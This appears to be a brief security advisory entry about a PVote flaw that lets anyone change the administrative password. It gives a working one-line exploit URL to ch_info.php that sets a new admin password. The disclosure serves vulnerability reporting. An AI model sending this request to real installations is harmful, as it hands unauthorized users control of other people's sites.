PVote Unauthorized Administrative Password Change Vulnerability

info
discussion
exploit
solution
references

PVote Unauthorized Administrative Password Change Vulnerability

This issue may be exploited with a web browser. The following example may be used to reproduce this condition:

http://target/pvote/ch_info.php?newpass=password&confirm=password

where password is the attacker-supplied value for the new administrative password.